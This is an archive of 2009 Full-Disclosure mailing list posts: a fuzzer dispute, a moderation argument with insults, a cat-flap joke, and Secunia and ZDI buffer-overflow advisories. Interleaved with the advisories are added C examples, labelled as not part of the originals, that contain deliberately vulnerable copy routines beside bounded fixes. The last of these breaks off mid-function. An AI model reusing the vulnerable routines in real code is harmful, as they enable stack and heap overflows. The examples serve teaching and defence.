From pete.licoln at gmail.com Sun Feb 1 00:49:05 2009 
From: pete.licoln at gmail.com (Pete Licoln)
Date: Sat, 31 Jan 2009 19:49:05 -0500
Subject: [Full-disclosure] Browser Fuzzer 2
In-Reply-To: <4984CCD7.6000404@gmail.com>
References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>
Message-ID:

Don't like it? Trash it. I did.
But on the other side, you ask for comments on your fuzzers; I give some constructive ones. Don't like it? Stay blind & trash it :)

Pete Licoln wrote:
> Hi Jeremy,
>
> I think this fuzzer is useless, and doesn't have any kind of innovation.
> This fuzzer acts as a cheap binary fuzzer, without any automation on
> the targeted browser, like the other fuzzers you've written.
> There are several DOM CSS DHTML fuzzers written in JS that are way more
> powerful; have you heard about them?
>
> Next time take some time before releasing such useless stuff.
>
> Regards
>
> 2009/1/31 Krakow Labs
>
> > That is one point I would like to get across: fuzzing doesn't have
> > to be and frequently isn't random, no matter how much the wikis copy its
> > 'definition'. The fuzzing oracle is the heart of the fuzzing process,
> > and making sure it is adequate to check for bugs is, I feel, a key to
> > being successful when fuzzing. I understand that near complete
> > randomness can be effective as demonstrated with mangleme, etc, but I
> > rarely choose that approach when working on projects; I just do not
> > think of it as a huge benefit. And the number of fuzzing files is
> > limited to the functions and tags and to the fuzzing oracle, all of
> > which can be modified and rearranged. Information, information,
> > information :)
> >
> > You did ask some good questions, thanks for your input.
> >
> > webDEViL wrote:
> > > Hello Jeremy,
> > >
> > > I am in no way trying to criticise your work, just had a few questions
> > > that I had to ask :)
> > >
> > > Your fuzzers are like meant to be run only once, cause pretty much
> > > everyone will have the same files created.
> > > Why isn't there any randomness in creating the fuzzed files?
> > > bf2[phase four] JS Process Complete (Final Count: 8004).
> > >
> > > Well I am saying that your fuzzer will die, in like a day, cause the
> > > number of files is finite and very few in number.
> > > What's the point with such fuzzers being released to the community?
> > >
> > > Regards,
> > > webDEViL
> > >
> > > On Fri, Jan 30, 2009 at 11:14 PM, Krakow Labs wrote:
> > >
> > > > Krakow Labs Development
> > > >
> > > > Browser Fuzzer 2 (bf2) is a comprehensive web browser fuzzer that
> > > > fuzzes CSS, DOM, HTML and JavaScript.
> > > >
> > > > bf2 is available @ www.krakowlabs.com
> > > >
> > > > -KL
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/

From ssdd.gr at gmail.com Sun Feb 1 04:52:35 2009
From: ssdd.gr at gmail.com (Miltiadis Kandias)
Date: Sun, 1 Feb 2009 06:52:35 +0200
Subject: [Full-disclosure] Browser Fuzzer 2
In-Reply-To:
References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>
Message-ID:

Mr Pete Licoln,

Excuse me for being rude, but you said you made constructive comments. You must be totally ignorant to believe that. I haven't tested the fuzzer yet, but if I don't like it I will say thank you and never use it again. If I see potential I will give some comments. I think that you insulted yourself by making such comments, even though you seem not to care. But, on the other side, what do I know? I am just a fellow Greek...

Have a nice day!

From bambenek.infosec at gmail.com Sun Feb 1 17:41:38 2009
From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP)
Date: Sun, 1 Feb 2009 11:41:38 -0600
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To: <49849AF1.3050207@gmail.com>
References: <20090130143205.GA17036@grok.org.uk> <20090130191615.GA7598@sivokote.iziade.m$> <754924960901301814r43208297k21a1aff1bb922ba2@mail.gmail.com> <49842A0E.7010709@gmail.com> <20882.1233400524@turing-police.cc.vt.edu> <49849AF1.3050207@gmail.com>
Message-ID:

Looks like someone else is volunteering to join Andrew in F-D purgatory.

On 1/31/09, don bailey wrote:
> Valdis.Kletnieks at vt.edu wrote:
>> On Sat, 31 Jan 2009 03:38:06 MST, don bailey said:
>>
>>> of noise. If this is allowed, it only proves that free venues for
>>> security discussion (rational or not) can be manipulated with something
>>> as simple as inane chatter.
>>
>> It's *long* been understood within the security community that the best
>> way to deal with a DoS attack is to disable the source of the attack.
>>
>
> Seriously, why are you even talking? Do you really think anyone
> considers your rampant condescending remarks to have any semblance of
> value? Go trim your UNIX beard.
>
> D
>

-- 
Sent from my mobile device

From ghosts at gmail.com Sun Feb 1 18:22:51 2009
From: ghosts at gmail.com (ghost)
Date: Sun, 1 Feb 2009 13:22:51 -0500
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To:
References: <20090130143205.GA17036@grok.org.uk> <20090130191615.GA7598@sivokote.iziade.m$> <754924960901301814r43208297k21a1aff1bb922ba2@mail.gmail.com> <49842A0E.7010709@gmail.com> <20882.1233400524@turing-police.cc.vt.edu> <49849AF1.3050207@gmail.com>
Message-ID: <6f4bb0b50902011022w4bee72cyd9c4cd206c52a322@mail.gmail.com>

As much as I try and squint, your e-mail address still doesn't turn into johnc at grok.org.uk, so maybe you should shut the fuck up and not play moderator when you aren't wanted nor needed.

On Sun, Feb 1, 2009 at 12:41 PM, John C. A. Bambenek, GCIH, CISSP wrote:
> Looks like someone else is volunteering to join Andrew in F-D purgatory
>

From vulcanius at gmail.com Sun Feb 1 18:27:41 2009
From: vulcanius at gmail.com (vulcanius)
Date: Sun, 1 Feb 2009 13:27:41 -0500
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To: <20090130143205.GA17036@grok.org.uk>
References: <20090130143205.GA17036@grok.org.uk>
Message-ID:

Thank you.

From pete.licoln at gmail.com Sun Feb 1 21:51:27 2009
From: pete.licoln at gmail.com (Pete Licoln)
Date: Sun, 1 Feb 2009 16:51:27 -0500
Subject: [Full-disclosure] Browser Fuzzer 2
In-Reply-To:
References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>
Message-ID:

I'm not a dick to people, and that's not the purpose of my comments.
But he's releasing a fuzzer a day:

- RSH Fuzzer
- CVS Fuzzer
- PDF Fuzzer
- SSH Fuzzer
- JPEG Fuzzer
- TFTP Fuzzer
- MySQL Fuzzer
- Browser Fuzzer (1 & 2)
- MP3-TAGS Fuzzer

They're all the same kind of fuzzing, on totally different kinds of protocols. He asks for comments, and I'm saying kindly to this man that he can release BETTER stuff if he waits and studies a protocol a bit more.

From prb at lava.net Sun Feb 1 22:17:27 2009
From: prb at lava.net (Peter Besenbruch)
Date: Sun, 1 Feb 2009 12:17:27 -1000
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To:
References: <20090130143205.GA17036@grok.org.uk>
Message-ID: <200902011217.28111.prb@lava.net>

On Sunday 01 February 2009 08:27:41 vulcanius wrote:
> Thank you.

I have five Full Disclosure filtering lists, three of which are affected by John's decision. I went back and read this thread at one of the sites that archives Full Disclosure, because some of the users trigger the filters if they appear anywhere in the message; that's how bad it has gotten. So let me add my thanks to Vulcanius', and ask if you have a list of the banned names, so I can adjust my filters.

-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From 0xjbrown41 at gmail.com Sun Feb 1 23:52:46 2009
From: 0xjbrown41 at gmail.com (Jeremy Brown)
Date: Sun, 1 Feb 2009 18:52:46 -0500
Subject: [Full-disclosure] Browser Fuzzer 2
In-Reply-To:
References: <49833C69.20306@gmail.com> <8656dcd50901301640sd06a34bqbf069fce0c30e236@mail.gmail.com> <49847CE8.5010908@gmail.com> <4984CCD7.6000404@gmail.com>
Message-ID:

Pete,

I've never asked for comments. I don't release 'a fuzzer a day' either; those were coded across the months. This whole thread talks in circles around itself and your opinion counts just like everyone else's, peachy.

Jeremy

On Sun, Feb 1, 2009 at 4:51 PM, Pete Licoln wrote:
> I'm not a dick to people, and that's not the purpose of my comments.
> But he's releasing a fuzzer a day:
>
> - RSH Fuzzer
> - CVS Fuzzer
> - PDF Fuzzer
> - SSH Fuzzer
> - JPEG Fuzzer
> - TFTP Fuzzer
> - MySQL Fuzzer
> - Browser Fuzzer (1 & 2)
> - MP3-TAGS Fuzzer
>
> They're all the same kind of fuzzing, on totally different kinds of
> protocols. He asks for comments, and I'm saying kindly to this man that he
> can release BETTER stuff if he waits and studies a protocol a bit more.
>

From biz.marqee at gmail.com Mon Feb 2 05:32:18 2009
From: biz.marqee at gmail.com (Biz Marqee)
Date: Mon, 2 Feb 2009 16:32:18 +1100
Subject: [Full-disclosure] Administrivia: Spring Cleaning
Message-ID:

n3td3v being moderated is fantastic. His banning is not a strike against the "spirit" of FD; it's someone standing up and saying "I have had enough of this fruitcake".

Full Disclosure is great when it's dropping 0day, discussing security in general, coming off as a righteous plan9 ninja, insulting people who disagree with your opinion and all the rest that goes along with it. It isn't great when you have a serial pest constantly baiting people and flooding the list with junk... junk that has no technical or even comedic value. It's just rambling.

He isn't some passing troll... 3 years this guy has been spouting his nonsense, and I am sure this isn't a decision that John takes lightly, but something needed to be done before everyone left.

From mikie.simpson at gmail.com Mon Feb 2 10:10:25 2009
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Mon, 2 Feb 2009 10:10:25 +0000
Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control
In-Reply-To: <4983589D.7090804@csuohio.edu>
References: <6171c6010901300857m748e84beld7ad454a5100ad19@mail.gmail.com> <4983589D.7090804@csuohio.edu>
Message-ID: <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.com>

On 1/30/09, Michael Holstein wrote:
>
> > Have any of you guys heard of RFID?
>
> Yeah .. wouldn't it make more sense to just build one that reads the
> AVID chip most pets have in them anyway?
>

Friends of mine couldn't understand how their kitchen was still full of cats every night after they implemented an RFID system on the cat's collar.

Turns out the cat was standing close enough to the door to activate the lock whilst its pals gained entry.

Social engineering / evil employee approach.

mike

From nekramer at mindtheater.net Mon Feb 2 11:02:18 2009
From: nekramer at mindtheater.net (Nancy Kramer)
Date: Mon, 02 Feb 2009 06:02:18 -0500
Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control
In-Reply-To: <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.com>
References: <6171c6010901300857m748e84beld7ad454a5100ad19@mail.gmail.com> <4983589D.7090804@csuohio.edu> <82abd3a70902020210i32302b87p5b6a86c83e519efc@mail.gmail.com>
Message-ID: <6.0.1.1.2.20090202060121.067d8ac0@mail.mindtheater.net>

Most people don't realize it, but cats are actually very social animals. Also very smart. That explains the behavior you are seeing.

Regards,

Nancy Kramer

At 05:10 AM 2/2/2009, Michael Simpson wrote:
>On 1/30/09, Michael Holstein wrote:
>>
>> > Have any of you guys heard of RFID?
>>
>> Yeah .. wouldn't it make more sense to just build one that reads the
>> AVID chip most pets have in them anyway?
>>
>
>Friends of mine couldn't understand how their kitchen was still full
>of cats every night after they implemented an RFID system on the cat's
>collar.
>
>Turns out the cat was standing close enough to the door to activate
>the lock whilst its pals gained entry.
>
>Social engineering / evil employee approach.
>
>mike

From remove-vuln at secunia.com Mon Feb 2 11:36:53 2009
From: remove-vuln at secunia.com (Secunia Research)
Date: Mon, 2 Feb 2009 12:36:53 +0100
Subject: [Full-disclosure] Secunia Research: Free Download Manager Remote Control Server Buffer Overflow
Message-ID: <200902021136.n12Bar4u023163@ca.secunia.com>

======================================================================

                     Secunia Research 02/02/2009

   - Free Download Manager Remote Control Server Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Free Download Manager 2.5 Build 758
* Free Download Manager 3.0 Build 844

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

======================================================================
3) Vendor's Description of Software

"What is Free Download Manager? It is a powerful, easy-to-use and
absolutely free download accelerator and manager. Moreover, FDM is 100%
safe, open-source software distributed under GPL license."

Product Link:
http://www.freedownloadmanager.org/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Free Download
Manager, which can be exploited by malicious people to compromise a
user's system.

The vulnerability is caused by a boundary error in the Remote Control
Server when processing "Authorization" headers in HTTP requests. This
can be exploited to cause a stack-based buffer overflow via an HTTP
request containing an overly long "Authorization" header.

Successful exploitation allows execution of arbitrary code.

======================================================================
5) Solution

Update to version 3.0 build 848.

======================================================================
6) Time Table

20/01/2009 - Form submitted on the vendor's website asking for e-mail
             address of security contact.
27/01/2009 - E-mail sent to various e-mail addresses asking for contact
             information of security contact.
27/01/2009 - Vendor response (e-mail address of security contact
             provided).
28/01/2009 - Vulnerability details sent to the vendor.
28/01/2009 - Fixed version provided for testing by the vendor.
28/01/2009 - Vendor informed that vulnerability is fixed.
31/01/2009 - Vendor issues fixed version.
02/02/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0183 for the vulnerability.
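The bug class in section 4, as an added example that is not part of the Secunia advisory and is not Free Download Manager's code: an HTTP "Authorization" value copied into a fixed-size stack buffer with no length check, beside a version that refuses values that do not fit. The 256-byte buffer, the function names and the sample requests are assumptions; nothing here is taken from the FDM source.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define AUTH_MAX 256   /* assumed size of the receiving stack buffer */

/* Case-insensitive match of "name:" at the start of a header line. */
static int name_at(const char *p, const char *name)
{
    for (; *name; p++, name++)
        if (tolower((unsigned char)*p) != tolower((unsigned char)*name))
            return 0;
    return *p == ':';
}

/* Locate header "name" in a raw request. Returns a pointer to its value
 * inside req and the value length (up to CR/LF) in *vlen, or NULL if the
 * header is absent. Nothing is copied here; the bug is in what happens
 * to the value afterwards. */
static const char *find_header(const char *req, const char *name, size_t *vlen)
{
    const char *p = req;
    while (p && *p) {
        if (name_at(p, name)) {
            const char *v = p + strlen(name) + 1;
            while (*v == ' ' || *v == '\t') v++;
            const char *e = v;
            while (*e && *e != '\r' && *e != '\n') e++;
            *vlen = (size_t)(e - v);
            return v;
        }
        p = strchr(p, '\n');          /* advance to the next header line */
        if (p) p++;
    }
    return NULL;
}

/* The vulnerable shape (never called here): the value goes into a fixed
 * stack buffer with no check, so a value of AUTH_MAX bytes or more
 * overwrites whatever follows creds[] on the stack. */
void auth_copy_unbounded(const char *req)
{
    char creds[AUTH_MAX];
    size_t vlen;
    const char *v = find_header(req, "Authorization", &vlen);
    if (!v) return;
    memcpy(creds, v, vlen);           /* overflow when vlen >= AUTH_MAX */
    creds[vlen] = '\0';
    (void)creds;
}

/* Bounded version: refuse a value that does not fit together with its
 * terminator. Returns 1 on success, 0 if the header is absent and -1 if
 * it is overlong (answer 400 or 431; do not truncate). */
int auth_copy_bounded(const char *req, char *out, size_t outsz)
{
    size_t vlen;
    const char *v = find_header(req, "Authorization", &vlen);
    if (!v) return 0;
    if (vlen >= outsz) return -1;
    memcpy(out, v, vlen);
    out[vlen] = '\0';
    return 1;
}

/* Constructed request whose Authorization value is auth_len bytes of 'A'. */
static void build_request(char *buf, size_t bufsz, size_t auth_len)
{
    size_t n = (size_t)snprintf(buf, bufsz,
        "GET /rc HTTP/1.1\r\nHost: 127.0.0.1\r\nAuthorization: ");
    size_t i;
    for (i = 0; i < auth_len && n + i + 5 < bufsz; i++) buf[n + i] = 'A';
    memcpy(buf + n + i, "\r\n\r\n", 5);    /* includes the NUL */
}

static char g_out[AUTH_MAX];

/* Ordinary constructed request; header name in lower case on purpose. */
int demo_short(void)
{
    static const char req[] = "GET /rc HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                              "authorization: Basic dXNlcjpwYXNz\r\n\r\n";
    return auth_copy_bounded(req, g_out, sizeof g_out);
}
const char *demo_short_value(void) { return g_out; }

/* No Authorization header at all. */
int demo_absent(void)
{
    return auth_copy_bounded("GET /rc HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
                             g_out, sizeof g_out);
}

/* 600-byte value: would smash the stack in auth_copy_unbounded. */
int demo_overlong(void)
{
    char req[2048], out[AUTH_MAX];
    build_request(req, sizeof req, 600);
    return auth_copy_bounded(req, out, sizeof out);
}

int main(void)
{
    printf("short:    %d (%s)\n", demo_short(), demo_short_value());
    printf("absent:   %d\n", demo_absent());
    printf("overlong: %d\n", demo_overlong());
    return 0;
}
```

Refusing rather than truncating matters: a silently shortened credential can still be compared against the stored one, and an explicit 400 or 431 tells the client what went wrong. Building with `-fstack-protector-strong` and running under AddressSanitizer turns the unbounded variant into an immediate abort instead of a silent return-address overwrite, which is how the overlong case should be caught in testing.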
======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-3/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From remove-vuln at secunia.com Mon Feb 2 11:37:02 2009
From: remove-vuln at secunia.com (Secunia Research)
Date: Mon, 2 Feb 2009 12:37:02 +0100
Subject: [Full-disclosure] Secunia Research: Free Download Manager Torrent Parsing Buffer Overflows
Message-ID: <200902021137.n12Bb240023201@ca.secunia.com>

======================================================================

                     Secunia Research 02/02/2009

     - Free Download Manager Torrent Parsing Buffer Overflows -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Free Download Manager 2.5 Build 758
* Free Download Manager 3.0 Build 844

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System compromise
Where:  Remote

======================================================================
3) Vendor's Description of Software

"What is Free Download Manager? It is a powerful, easy-to-use and
absolutely free download accelerator and manager. Moreover, FDM is 100%
safe, open-source software distributed under GPL license."

Product Link:
http://www.freedownloadmanager.org/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered some vulnerabilities in Free Download
Manager, which can be exploited by malicious people to compromise a
user's system.

1) A boundary error in the parsing of file names inside torrent files
can be exploited to cause a heap-based buffer overflow via an overly
long file name.

2) Two boundary errors when parsing names from torrent files can be
exploited to cause stack-based buffer overflows via overly long file
names.

3) A boundary error when parsing tracker URLs from torrent files can be
exploited to cause a stack-based buffer overflow via an overly long
tracker URL.

4) A boundary error when parsing comments from torrent files can be
exploited to cause a stack-based buffer overflow via an overly long
comment.

Successful exploitation of the vulnerabilities allows execution of
arbitrary code by e.g. tricking a user into opening a specially crafted
torrent file.

======================================================================
5) Solution

Update to version 3.0 build 848.

======================================================================
6) Time Table

20/01/2009 - Form submitted on the vendor's website asking for e-mail
             address of security contact.
27/01/2009 - E-mail sent to various e-mail addresses asking for contact
             information of security contact.
27/01/2009 - Vendor response (e-mail address of security contact
             provided).
28/01/2009 - Vulnerability details sent to the vendor.
28/01/2009 - Fixed version provided for testing by the vendor.
28/01/2009 - Vendor informed that all vulnerabilities have not been
             properly fixed.
30/01/2009 - New fixed version provided by the vendor.
30/01/2009 - Vendor informed that all vulnerabilities are fixed.
31/01/2009 - Vendor issues fixed version.
02/02/2009 - Public disclosure.
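An added example, not Secunia's or FDM's code, of how the fields the advisory lists (file names, tracker URLs, comments) should be read from a torrent: each is a bencoded string of the form "<length>:<bytes>", and the length the file declares has to be checked against the bytes actually present and against an application limit before anything is allocated or copied. Skipping the first check is the heap-overflow shape; moving the result into a fixed local array without the second is the stack one. The cap, the function names and the inputs are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_CAP 1024   /* assumed application limit for one name/URL/comment */

/* Read one bencoded string "<len>:<bytes>" at buf[*pos]. On success the
 * bytes are copied into a fresh NUL-terminated heap block in *out, *pos
 * is advanced past them and the length is returned. Any malformed,
 * truncated or over-cap string returns -1 without allocating. */
long bdecode_string(const unsigned char *buf, size_t len, size_t *pos,
                    size_t cap, char **out)
{
    size_t i = *pos, n = 0;
    int digits = 0;
    while (i < len && buf[i] >= '0' && buf[i] <= '9') {
        if (n > (SIZE_MAX - 9) / 10) return -1;   /* length would wrap */
        n = n * 10 + (size_t)(buf[i] - '0');
        i++; digits++;
    }
    if (digits == 0 || i >= len || buf[i] != ':') return -1;
    i++;
    if (n > cap) return -1;        /* over the application limit */
    if (n > len - i) return -1;    /* declares more bytes than are present:
                                      copying n here is the heap overflow */
    char *s = malloc(n + 1);       /* n <= cap, so n + 1 cannot wrap */
    if (!s) return -1;
    memcpy(s, buf + i, n);
    s[n] = '\0';
    *out = s;
    *pos = i + n;
    return (long)n;
}

/* Move a decoded name into a fixed-size local buffer the way a UI or
 * path routine might; refusing when it does not fit is what prevents
 * the stack-based variants. Returns 1 if copied, 0 if refused. */
int name_to_fixed(const char *name, char *dst, size_t dstsz)
{
    size_t n = strlen(name);
    if (n >= dstsz) return 0;
    memcpy(dst, name, n + 1);
    return 1;
}

/* Constructed inputs follow. */

int demo_valid(void)   /* "4:spam3:abc" -> "spam", "abc", consumes everything */
{
    static const unsigned char in[] = "4:spam3:abc";
    size_t pos = 0, len = sizeof in - 1;
    char *a = NULL, *b = NULL, fixed[8];
    int ok = bdecode_string(in, len, &pos, NAME_CAP, &a) == 4 &&
             bdecode_string(in, len, &pos, NAME_CAP, &b) == 3 &&
             strcmp(a, "spam") == 0 && strcmp(b, "abc") == 0 &&
             pos == len && name_to_fixed(a, fixed, sizeof fixed) == 1;
    free(a); free(b);
    return ok;
}

long demo_truncated(void)   /* declares 500 bytes, only 2 follow */
{
    static const unsigned char in[] = "500:ab";
    size_t pos = 0; char *s = NULL;
    return bdecode_string(in, sizeof in - 1, &pos, NAME_CAP, &s);
}

long demo_over_cap(void)    /* 2000 bytes really present, but over NAME_CAP */
{
    static unsigned char in[5 + 2000];
    size_t pos = 0; char *s = NULL;
    memcpy(in, "2000:", 5);
    memset(in + 5, 'A', 2000);
    return bdecode_string(in, sizeof in, &pos, NAME_CAP, &s);
}

long demo_malformed(void)   /* no length digits at all */
{
    static const unsigned char in[] = ":abc";
    size_t pos = 0; char *s = NULL;
    return bdecode_string(in, sizeof in - 1, &pos, NAME_CAP, &s);
}

int demo_fixed_refused(void) /* a 20-byte name does not fit an 8-byte buffer */
{
    char fixed[8];
    return name_to_fixed("twenty_byte_name.bin", fixed, sizeof fixed);
}

int main(void)
{
    printf("valid: %d truncated: %ld over_cap: %ld malformed: %ld refused: %d\n",
           demo_valid(), demo_truncated(), demo_over_cap(), demo_malformed(),
           demo_fixed_refused());
    return 0;
}
```

The order of the two checks is deliberate: the cap test runs first so that a hostile length such as 4 GB never reaches the allocation, and the `len - i` test then guarantees `memcpy` only ever reads bytes that are inside the buffer that was actually read from the file.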
======================================================================
7) Credits

Discovered by Carsten Eiram, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0184 for the vulnerabilities.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-5/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From shawnmer at gmail.com Mon Feb 2 13:27:02 2009
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Mon, 2 Feb 2009 08:27:02 -0500
Subject: [Full-disclosure] Hackery Channel 01-09-01-LOLZ: Cat Spoofing against Flow Control
In-Reply-To: <18572.1233335278@turing-police.cc.vt.edu>
References: <18572.1233335278@turing-police.cc.vt.edu>
Message-ID:

On Fri, Jan 30, 2009 at 12:07 PM, wrote:
> On Thu, 29 Jan 2009 17:04:53 CST, hack ery said:
>>
>> Security Risk: High
>> Exploitable: Local
>> Vulnerability: Arbitrary Flow Control Control, Cat Spoofing
>> Discovered by: The Hackery Channel
>
> Note the additional possibility of a brute force attack:
>
> http://icanhascheezburger.files.wordpress.com/2009/01/funny-pictures-your-cat-is-ready-to-admit-he-gained-weight.jpg

There's also potential for a low-silhouette piggyback attack vector:

http://loganbay.org/wp-content/uploads/2007/10/thundercat.jpg

Cheers,
--scm

From zdi-disclosures at 3com.com Mon Feb 2 17:52:54 2009
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Mon, 2 Feb 2009 11:52:54 -0600
Subject: [Full-disclosure] ZDI-09-010: Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability
Message-ID:

ZDI-09-010: Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-010
February 2, 2009

-- Affected Vendors:
Novell

-- Affected Products:
Novell Netware

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 1047. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Novell Netware Groupwise SMTP daemon. Authentication is not required to exploit this vulnerability.

The specific flaw exists during the parsing of malformed RCPT verb arguments to the SMTP daemon. When an overly long e-mail address is received, an off-by-one condition is triggered which minimally will cause a denial of service and can result in arbitrary code execution.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:

    http://download.novell.com/Download?buildid=GjZRRdqCFW0
    http://download.novell.com/Download?buildid=HpEEW7aXWEY

-- Disclosure Timeline:
2008-08-26 - Vulnerability reported to vendor
2009-02-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Nick DeBaggis

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
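The off-by-one described under Vulnerability Details, as an added example that is not Novell's or ZDI's code: an SMTP "RCPT TO:<address>" argument extracted into a fixed-size buffer. The vulnerable check uses `>` where `>=` is needed, so an address of exactly the buffer size passes and the terminating NUL is written one byte past the end; the corrected check reserves that byte. The 256-byte buffer and all names are assumptions, as is the exact shape of the GroupWise code, which is not public.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ADDR_MAX 256   /* assumed size of the recipient buffer */

/* Case-insensitive prefix test (SMTP verbs and "TO:" are case-insensitive). */
static int prefix_ci(const char *s, const char *pfx)
{
    for (; *pfx; s++, pfx++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*pfx))
            return 0;
    return 1;
}

/* Locate the path between '<' and '>' in an "RCPT TO:<...>" argument.
 * Returns a pointer to its first byte and its length in *alen, or NULL
 * if the argument is not well formed. Nothing is copied here. */
static const char *rcpt_path(const char *arg, size_t *alen)
{
    const char *lt, *gt;
    if (!prefix_ci(arg, "TO:")) return NULL;
    lt = strchr(arg + 3, '<');
    if (!lt) return NULL;
    gt = strchr(lt + 1, '>');
    if (!gt) return NULL;
    *alen = (size_t)(gt - lt - 1);
    return lt + 1;
}

/* The off-by-one (never called here): '>' lets alen == ADDR_MAX through,
 * memcpy fills the whole buffer, and the terminator lands in
 * addr[ADDR_MAX], one byte past the end. */
int copy_rcpt_off_by_one(const char *arg, char addr[ADDR_MAX])
{
    size_t alen;
    const char *a = rcpt_path(arg, &alen);
    if (!a) return -1;
    if (alen > ADDR_MAX) return -2;    /* BUG: must be >= */
    memcpy(addr, a, alen);
    addr[alen] = '\0';                 /* out of bounds when alen == ADDR_MAX */
    return (int)alen;
}

/* Corrected: one byte is reserved for the terminator. Returns the address
 * length, -1 for a malformed argument, -2 when it does not fit (the
 * server should answer with a 5xx reply rather than truncate). */
int copy_rcpt_bounded(const char *arg, char *addr, size_t addrsz)
{
    size_t alen;
    const char *a = rcpt_path(arg, &alen);
    if (!a) return -1;
    if (alen >= addrsz) return -2;
    memcpy(addr, a, alen);
    addr[alen] = '\0';
    return (int)alen;
}

/* Constructed argument "TO:<aaa...a>" with an address of alen bytes. */
static void make_arg(char *buf, size_t bufsz, size_t alen)
{
    size_t i;
    memcpy(buf, "TO:<", 4);
    for (i = 0; i < alen && 4 + i + 2 < bufsz; i++) buf[4 + i] = 'a';
    buf[4 + i] = '>';
    buf[5 + i] = '\0';
}

int demo_normal(void)          /* 16-byte address */
{
    char addr[ADDR_MAX];
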